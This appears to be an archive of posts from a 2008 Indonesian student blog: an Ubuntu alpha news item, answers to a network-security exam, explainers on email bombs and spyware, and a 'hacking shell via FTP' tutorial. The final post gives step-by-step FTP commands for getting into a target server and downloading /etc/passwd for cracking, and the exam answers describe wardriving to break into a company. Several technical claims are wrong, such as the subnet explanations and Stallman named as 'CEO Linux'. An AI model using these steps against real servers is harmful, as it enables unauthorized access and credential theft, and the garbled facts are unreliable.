Linux Rilis Ubuntu 8.04 Alpha 5  

Friday, May 30, 2008


BUCHAREST - Linux memperkenalkan seri kelima dari Ubuntu, Ubuntu 8.04 Alpha 5. Di seri terbaru ini, Ubuntu menawarkan beberapa aplikasi baru, seperti Transmission, Brasero, dan Linux kernel 2.6.24.2.

Ketiga aplikasi di atas merupakan aplikasi terbaru untuk default Ubuntu Alpha 5, Transmission sebagai client BitTorrent, Brasero untuk aplikasi burning CD dan DVD, dan Linux Kernel 2.6.24.2 sebagai Firewall generasi terbaru.

Tidak hanya itu saja, ada beberapa fitur baru lainnya yang diupdate khusus dari Ubuntu 8.04 Alpha 4, seperti misalnya Vinagre, merek terbaru untuk default client VNC menggantikan xvnc4viewer, World Clock and Weather, fitur penunjuk waktu dengan fungsi baru yang disupport oleh GNOME, UFW sebagai pengatur firewall, dan GVFS sebagai virtual file-system yang kini disupport Nautilus.

"Para pengembang Ubuntu bekerja sangat cepat sehingga membawa kita ke software terbaik sekaligus terbaru yang ditawarkan oleh Komunitas Open Source. Alpha 5 merupakan rilisan kelima Ubuntu 8.04 dengan sajian pengalaman dan fitur terbaru," ungkap CEO Linux, Richard Stallman. (sumber : http://techno.okezone.com)

Email this post

UJIIAN AKHIR SEMESTER KEAMANAN JARINGAN  

Thursday, May 15, 2008

Nama : Putu Okta Setiawan
NIM : 0615353108
Tempat magang : SMA PGRI 6 Denpasar
Email : okta_samblung@yahoo.co.id
Nama Web Blog : electronoize.blogspot.com


1. Keamanan jaringan tidak terlepas dari sistem pengalamatannya. Untuk itu apa yang
anda dapat jelaskan dari alamat 195.166.15.0/25? Sedangkan apa analisa anda dengan pengalamatan 170.10.155.21:25? Apa hubungannya dengan sistem keamanan jaringan?

Jawaban
195.166.15.0/25
Jaringan pribadi 195.166.15.0/25 dapat diinterpretasikan sebagai sebuah block dari 256 network identifier kelas C atau sebagai sebuah ruangan alamat yang memiliki 16 bit yang dapat ditetapkan sebagai host identifier yang dapat digunakan dengan menggunakan skema subnetting apapun di dalam sebuah organisasi privat.
170.10.155.21/25
Jaringan pribadi 170.10.155.21/25 dapat diinterpretasikan sebagai sebuah block dari 16 network identifier kelas B atau sebagai sebuah ruangan alamat yang memiliki 20 bit yang dapat ditetapkan sebagai host identifier, yang dapat digunakan dengan menggunakan skema subnetting di dalam sebuah organisasi privat.

2. Subnetting merupakan bagian dari strategi pengalamatan. Menurut analisa anda
apakah subnettting ada hubungannya dengan sistem keamanan jaringan? Misalkan
dalam sebuah LAN terdapat 3 PC yang terhubung dengan 1 switch yang masingmasing memiliki IP 192.168.1.11/25, 192.168.1.12/25 dan 192.168.1.200/25, jika salah satu dari ketiga PC tersebut terkena Virus dan tidak ada antivirusnya bagaimana dengan PC yang lain, apakah akan tertular virus juga? Apa analisa anda?


3. Jika email anda tiba-tiba mendapat kiriman mail yang sangat banyak dari pengirim
yang tidak anda kenal sebelumnya (terjadi kebanjiran mail) dimana kejadian ini terus berulang pada hari-hari selanjutnya, menurut anda apa penyebabnya? Dan apa langkah anda untuk mengatasi gangguan tersebut?

Jawaban
•Menurut saya adalah pesan dari mailist yang terlalu banyak langkah saya untuk mengatasi masalah ini adalah:
•Menggunakan fasilitas No Mail pada yahoo karena mail saya adalah yahoo(tidak menerima mail dari mailist) dan mengecek pesan pada web yahoo groups. Langkahnya adalah dengan cara:
•Akseslah halaman web dari milis tersebut. Tak perlu khawatir jika Anda tidak tahu apa alamatnya, sebab ini sudah ada rumusnya, yaitu: http://groups.yahoo.com/group/nama_group. Gantilah "nama_group" dengan nama milis yang Anda ikuti. Misalnya nama milis Anda adalah penulislepas, maka alamat webnya adalah http://groups.yahoo.com/group/penulislepas. Jika Anda tidak tahu apa nama milisnya, coba cek alamat email dari milis tersebut. Jika alamatnya adalah nonfiksi@yahoogroups.com, maka nama milisnya adalah nonfiksi. Jadi, alamat webnya adalah http://groups.yahoo.com/group/nonfiksi.
•Anda akan melangkah pada halaman “you mustselect a yahoo profile dan klik halaman continue maka email anda sudah terintegerasi dengan account anda di yahoo groups.
•Setelah mengklik "continue" pada langkah keempat di atas, sebenarnya Anda akan otomatis masuk ke halaman web milis Anda. Jika tidak, silahkan akses dengan mengetik alamat situs seperti yang tercantum pada langkah 1 di atas. Di bagian tengah, kolom kanan, Anda akan menemukan tulisan "Most Recent Messages". Kliklah menu "(Group by Topic)" agar pesan-pesan pada milis tersebut dikelompokkan berdasarkan topiknya
•Sekarang, kliklah menu Messages yang terdapat pada kolom kiri, bagian atas. Anda akan melihat daftar pesan yang telah masuk ke milis tersebut. Semua pesan dikelompokkan berdasarkan topiknya. Ini akan sangat memudahkan anda dalam membaca pesan-pesan email di milis tersebut. Tampilan pesan-pesan ini bahkan lebih baik dari tampilan pesan email yang Anda baca lewat Yahoo! Mail
•Jadi, dengan cara ini, Anda tak perlu lagi khawatir bila inbox email Anda penuh, walau Anda mengikuti milis yang paling ramai sekalipun. Pilih saja opsi No Mail, lalu baca pesan-pesan milis Anda lewat web Yahoo! Groups.


4. Jika sebuah perusahaan menyewa anda untuk membangun sistem keamanan jaringan di perusahaan tersebut maka langkah-langkah apa saja yang anda lakukan untuk membuat jaringannya menjadi aman dan terproteksi dengan baik?
Jawaban
Langkah – langkah untuk membangun keamanan jaringan menjadi aman dan terproteksi :
1.Fisik / Physical Security. (melarang orang yang asing memakai komputer)
2.Manusia / Personel Security. (meningkatkan kemanan wilayah kerja/perusahaan)
3.Data, media , teknik dan komunikasi. (Menyiapkan software antivirus,antispyware,anti trojan dan worm)
4. Kebijakan dan prosedur. (tidak mengaktifkan fasilitas hotspot bila waktu kerja dan bila selesai bekerja CPU wajib mati)

5. Jika sebuah perusahaan menyewa anda untuk membobol sistem di perusahaan lain dan kemudian mencuri serta merusak data-datanya, maka langkah-langkah apa saja yang kira-kira akan anda lakukan untuk melaksanakan pekerjaan tersebut?
Jawaban
A. Wardrive : Wardrive adalah ekspedisi memancing elektronik untuk mencari jaringan wireless yang lemah di sekitar. Wardrive adalah ekspedisi memancing elektronik untuk mencari jaringan wireless yang lemah di sekitar.
Daftar peralatan yang dibutuhkan:
1. GPS receiver
2. Wireless PCMI card
3. Wireless antenna receiver
B. Pencarian Wireless Network
Kebanyakan jaringan wireless yang beredar tidak mempunyai sekuriti atau enkripsi yang melindunginya. Untuk melacaknya, dibutuhkan peralatan yang mendukung. Ada dua tools yang biasanya dipakai untuk tujuan ini.

6. Syarat untuk menjadi seorang hacker antara lain harus memahami protokol-protokol internet dan pemrograman komputer. Sebutkan dan jelaskan minimal 3 protokol internet yang paling sering dipakai !
Jawaban
1. HTTP (HyperText Transfer Protocol)
Hyper Text Transfer Protocol adalah suatu protokol internet yang digunakan oleh World Wide Web, sebuah metode atau protokol untuk mendowload file ke komputer. Protokol ini berbasis hyper text, sebuah format teks yang umum digunakan di Internet. Dengan protokol ini sebuah web client (dalam hal ini browser) seperti Internet Exporer atau Netscape dapat melakukan pertukaran data hypermedia, seperti teks, gambar, suara bahkan video dengan web server.
2. FTP (File Transfer Protocol)
FTP (singkatan dari File Transfer Protocol) adalah sebuah protokol Internet yang berjalan di dalam lapisan aplikasi yang merupakan standar untuk pentransferan berkas (file) komputer antar mesin-mesin dalam sebuah internetwork.
3. SMTP (Simple Mail Transfer Protocol)
SMTP (Simple Mail Transfer Protocol) merupakan salah satu protokol yang umum digunakan untuk pengiriman surat elektronik di Internet. Protokol ini dipergunakan untuk mengirimkan data dari komputer pengirim surat elektronik ke server surat elektronik penerima.
4. IRC (Internet Relay Chat)
Internet Relay Chat (IRC) adalah suatu bentuk komunikasi di Internet yang diciptakan untuk komunikasi kelompok di tempat diskusi yang dinamakan channel (saluran), tetapi juga bisa untuk komunikasi jalur pribadi.
5. POP3 (Post Office Protocol version 3)
POP3 (Post Office Protocol version 3) adalah protokol yang digunakan untuk mengambil surat elektronik (email) dari server email.
6. Telnet
Telnet adalah singkatan dari TELetype NETwork adalah sebuah protokol jaringan yang digunakan di koneksi Internet atau Local Area Network.


7. Anda tentu mengenal istilah Access Control List (ACL) yang merupakan materi di
Chapter 11 CCNA2, dimana ACL ini diimplementasikan pada router yang dijadikan
gateway yang menghubungkan jaringan LAN & WAN, menurut analisa anda adakah kaitan implementasi ACL dengan sistem keamanan jaringan, jelaskan?

Jawaban
Ada. banyak alasan untuk membuat ACL. Sebagai contoh, ACL dapat digunakan untuk membatasi traffic jaringan dan meningkatkan kinerja jaringan. Misalnya, ACL dapat membuat paket tertentu supaya diproses oleh router sebelum traffic lain, berdasarkanprotokol. Ini disebut queuing, yang memastikan bahwa router tidakakan memproses paket yang tidak diperlukan. Hasilnya, queing membatasi traffic jaringan dan mengurangi kemacetan jaringan. ACL dapat Memberikan kontrol terhadap traffic jaringan. Sebagai contoh, ACL dapat melarang atau mengurangi update routing. Larangan inidigunakan untuk membatasi informasi tentang suatu jaringan supaya tidak disebarkan melalui jaringan.
ACL juga dapat memberikan pengamanan (tingkat dasar) untuk akses jaringan. Sebagai contoh, ACL dapat memperbolehkan satu host mengakses suatu bagian jaringan Anda dan mencegah host lain mengakses bagian yang sama. Host A diperbolehkan untuk mengakses jaringan SDM, dan Host B tidak boleh mengakses jaringan SDM. Jika Anda tidak membuat ACL pada router, semua paket yang dilewatkan melalui router bisa diperbolehkan ke semua bagian jaringan. Terakhir, ACL dapat digunakan untuk memilih jenis traffic yang diteruskan atau diblokir pada router. Sebagai contoh, Anda bisa memperbolehkan e-mail, tetapi pada saat yang sama memblokir semua telnet.


8. Jika anda seorang network administrator di sebuah perusahaan dimana tiba-tiba
internet di perusahaan tersebut menjadi sangat lambat dan traffic analyzer menunjukan pemakaian bandwith yang sangat tinggi sedangkan anda tahu bahwa tidak ada yang memakai internet pada saat itu? Menurut analisa anda apa penyebabnya? Bagaimanacara penanggulangannya?

Jawaban
Analisanya :
Virus, worm, malware dan spyware menjadi penyebab lambatnya akses komputer, baik disebabkan resource komputer yang dihabiskan di komputer itu sendiri, ataupun juga karena worm yang memancarkan paket-paket dengan kecepatan tinggi.
Penanggulangannya :
Solusi pembasmian penyakit komputer ini adalah dengan update reguler sistem operasi, pemasangan aplikasi antivirus dan aplikasi spyware removal dan detector. Penggunaan browser Internet yang lebih baik juga dianjurkan untuk mengurangi kemungkinan terkena penyakit.

9. Firewall memiliki arti yang sangat penting dalam sistem keamanan jaringan, hal-hal
apa saja yang dapat dilindungi oleh firewall? Parameter apa yang dipakai untuk
melakukan hal tersebut?

Jawaban
Hal – hal yang dilindungi oleh firewall
1. Mesin atau computer
2. Jaringan
Parameter yang di gunakan firewall
1. Service control (kendali terhadap layanan)
2. Direction Control (kendali terhadap arah)
3. User Control (kendali terhadap pengguna)
4. Behavior Control (kendali terhadap perlakuan)


10. Selain firewall terdapat banyak alat bantu (tools) lain yang dapat dipakai untuk
membantu seorang network administrator memonitor keamanan di dalam jaringan.
Sebutkan dan jelaskan tools-tools yang anda ketahui!

Jawaban
1. Intrusion Detection System
Sistem ini akan mendeteksi pola atau perilaku paket data yang masuk ke jaringan untuk beberapa waktu sehingga dapat dikenali apakah paket data tersebut merupakan kegiatan dari pihak yang tidak berhak atau bukan.

2. Network Scanner
Scanner adalah sebuah program yang secara otomatis akan mendeteksi kelemahan-kelemahan (security weaknesses) sebuah komputer di jaringan local (local host) maupun komputer di jaringan dengan lokasi lain (remote host).

3. Packet Sniffing
Program ini berfungsi sebagai alat untuk memonitor jaringan komputer. Alat ini dapat diperasikan hampir pada seluruh tipe protokol seperti Ethernet, TCP/IP, IPX, dan lain-lain.

Email this post

Email Bomb  

Tuesday, May 13, 2008

Email Bomb merupakan istilah untuk email yang dipergunakan untuk melumpuhkan komputer yang terhubung ke Internet, bahkan seluruh jaringan komputer perusahaan dapat dilumpuhkan dengan Email Bomb ini. Untuk melakukan serangan dengan cara ini, jumlah email dan ukuran email harus cukup besar.

Metode paling sederhana dari email bomb ini adalah dengan mengirimkan sejumlah besar email berukuran besar ke alamat email korban. Jumlah yang dikirimkan tidak harus ratusan atau ribuan, asalkan ukuran email yang dikirim besar, misalnya dengan memberikan sejumlah file ukuran besar pada attachment-nya.Email pribadi dapat juga menjadi sasaran email bomb. Sebagai contoh adalah bila seseorang mengirimkan email berukuran 10 MB beberapa kali saja dalam sehari, maka dalam beberapa hari mailbox alamat email yang dituju akan segera penuh dan server secara otomatis akan menolak email dari pihak lain yang akan masuk. Hal ini dapat menjadi semakin parah jika orang tersebut berlangganan sejumlah besar mailing list.
Untuk melindungi komputer dari email bomb, kita dapat mempergunakan Email Remover. Dengan Email Remover, kita tidak perlu mendownload keseluruhan email, tetapi hanya header-nya saja. Dengan mempergunakan daftar email dan mengetahui ukurannya, kita langsung dapat memilih email mana saja yang harus kita buka.

Email this post

Melindungi Data dari Spyware  

Saturday, May 10, 2008


Definisi Spyware
Spyware merupakan turunan dari adware, yang memantau kebiasaan pengguna dalam melakukan penjelajahan Internet untuk mendatangkan "segudang iklan" kepada pengguna. Tetapi, karena adware kurang begitu berbahaya (tidak melakukan pencurian data), spyware melakukannya dan mengirimkan hasil yang ia kumpulkan kepada pembuatnya (adware umumnya hanya mengirimkan data kepada perusahaan marketing).
Ketika browsing internet tiba-tiba muncul pop-up windows, seperti iklan. Nah, itu adalah salah satu spyware. Definisi umum spyware adalah program kecil yang bekerja secara otomatis pada saat kita browsing internet atau memata-matai kegiatan online kita lalu mengirimkan hasil pantauannya ke host server spyware tersebut. Jenis spyware sangat banyak, ada yang hanya bertugas merotasi tampilan iklan pada software, ada yang menyadap informasi konfigurasi komputer kita, ada yang menyadap kebiasaan online kita, dan sebagainya.
Banyak cara yang dilakukan oleh spyware, Diantaranya melalui software gratisan (Freeware dan Shareware), juga dari situs internet yg kita kunjungi dimana secara diam-diam mereka menginstallkan dirinya sendiri ke komputer kita. Biasanya Spyware bekerja terus menerus (terutama saat kita online atau ketika menggunakan browser) dan beberapa malah mengubah/mengganti file-file system windows yg asli dengan file-file mereka. Tentu ini menambah beban kerja windows yang normal.

Kerugian dengan adanya Spyware
Pencurian Data
Kebanyakan informasi yang "dicuri" adalah kebiasaan pengguna dalam menjelajahi Internet, tapi banyak juga yang mencuri data-data pribadi, seperti halnya alamat e-mail (untuk dikirimi banyak surat e sampah (spam).

Tambahan Biaya Pemakaian Internet
Yang paling menjengkelkan dari keberadaan spyware, selain banyaknya iklan yang mengganggu adalah pemborosan bandwidth dan privasi yang telah "dijajah".

Cara Mencegah Masuknya Adware dan Spyware

Sebelumnya banyak sekali anti-spyware yang bisa di-download gratis seperti Spybot. Namun saat ini, sudah banyak sekali yang berupa versi komersial alias mesti bayar lisensi nya. Memang masih terdapat beberapa yang gratisan namun database spyware mereka tidak sekomplit yang komersil. Kenapa ? Karena otomatis tim anti-spyware yang komersial mendapatkan dana dari lisensi yang mereka jual sedangkan yang freeware alias gratisan mendapatkan dana biasanya hanya dari sumbangan.

Berikut ini tips yang bisa dilakukan untuk mencegah spyware :
1. Hati-hati dalam melakukan browsing ke situs-situs yang ‘tidak jelas’ di Internet. Biasanya terutama situs-situs underground, situs-situs hacking dan situs-situs crack.

2. Khusus untuk program freeware atau gratisan, sebelum digunakan, lihat informasi di bagian review pengguna, apakah ada yang komplain mengenai spyware di dalamnya. Karena umumnya spyware ada di program yang freeware.

3. Usahakan tidak menggunakan program-program seperti P2P sharing dan Download Accelerator contohnya Kazaa, download plus dan sebagainya.

4. Lakukan Windows update secara rutin. Spyware selama ini memang menargetkan windows sebagai platform utama sebagai sasarannya. Terbukti banyak sekali BHO – browser helper object yang dibuat untuk running atau attach ke MSIE (Microsoft Internet Explorer). Meskipun tidak menjamin bahwa IE nya akan kebal terhadap spyware tapi setidaknya mengurangi lubang-lubang security yang bisa digunakan sebagai pintu masuk bagi spyware.

5. Pada saat download program di Internet, kalau bisa baca dulu EULA nya (End-User License Agreement) karena biasanya di dalam klausalnya sengaja dibuat serumit dan sepanjang mungkin yang mungkin didalamnya ada klausal untuk instalasi spyware. Ada program yang EULA sebanyak 131 halaman, siapa yang mau baca ? tapi itu memang sengaja dibuat seperti itu sehingga apabila terjadi tuntutan hukum di kemudian hari mereka punya bukti.

6. Install anti-spyware, seperti ad aware. Tapi kadang spyware terbaru tidak terdeteksi, makanya harus sering di update. Jika cara ini belum memuaskan, coba dengan tools berikut, yang pertama CWShredder dilanjutkan dengan HijackThis. Bisa di download di situs ini http://www.spywareinfo.com/~merijn/downloads.html. Ada beberapa tools lain disana, mungkin bisa kamu coba juga.

7. Dalam menggunakan HijackThis harus diperhatikan betul-betul sebelum menghapus apa-apa yang terdeteksi, Untuk mencegah Spyware tidak balik lagi, rajin-rajinlah mengupadate database anti-virus dan anti-spyware dari OS yg anda gunakan, lalu berhati-hati ketika browsing, Hati-hati ketika meggunakan software gratis (contoh: kazaa), Pasang anti virus dan update terus. Atau beralih ke OS lain?

8. Apabila saat browsing, keluar pop-up window, jangan klik ke windows tersebut tapi langsung tutup windows tersebut.

9. Menggunakan Progam Pemburu Spyware & Adware. Beberapa utilitas yang dapat digunakan untuk memburu adware, seperti halnya Ad-Aware dari LavaSoft juga dapat memburu spyware, karena memang spyware merupakan turunan dari adware. Untuk memburu spyware, anda dapat menggunakan AVG Anti-Spyware, ataupun progam anti-spyware lainnya. Sekedar memperingatkan, AVG Anti-Spyware tidak memiliki Free Version, hanya ada Full Version & Trial Version. Bila anda mendownload AVG Anti-Spyware Free Version, sama saja anda mendownload AVG Anti-Spyware Trial Version.

10. Mematikan Cookies. Cara ini juga dapat dilakukan dengan block all cookies atau menolak semua cookies untuk masuk ke komputer pengguna.

Walaupun tips di atas tidak bisa menjamin 100% bebas dari spyware, namun setidaknya kita bisa mengurangi ancaman dari spyware tersebut

Email this post

Hacking - Hacking shell via FTP  

Wednesday, May 7, 2008

Berikut ini adalah cara menghack menggunakan Windows, yang digunakan untuk mendapatkan password file dari sebuah shell. Cara ini menggunakan ftp protocol. Kebanyakan paswordnya id sembunyikan /shadowed, tapi kamu masih bisa mendapatkannya dg meng-finger atau menebak passwordnya untuk loginnya.


Kamu dapat memulainya dg membuka/memasuki sebuah shell, dan kamu tidak perlu/tidak harus menggunakan/ berada didalam sebuah ftp server. Berikut langkah-langkahnya :

1.jalankan prompt
2.Tuliskan command untuk membuka dos command prompt
3.tuliskan ftp server.to.hack.com (nama servernya!!)
4.Akan muncul prompt login.. tekan enter saja (tidak perlu menuliskan apa apa)
5.Akan muncul password login.. tekan saja enter...
6.sekarang ketiklah "quote user ftp" dan tekan enter
7.lalu ketik "quote cwd ~root" tekan enter
8.dan ketikan "quote pass ftp" tekan enter
Sekarang kamu sudah memiliki guest access dan dapat mendownload password file.. and have a fuckin' shit with that
9.ketiklah "cd etc" tekan enter.. untuk mendapatkan -etc directory- yg berisi file password
10.ketiklah "get passwd" untuk mendownload passw.file ke HD mu

Sekarang kamu suda memiliki password file dan kamu dapat membukanya di C:passwd dengan menggunakan notepad. Jika file tersebut di enkripsi.. kamu bisa meng-crackernya.. dan jika tidak dienkripsi.. (You lucky) kamu dapat mencocokan antara user login dg passwordnya....

Email this post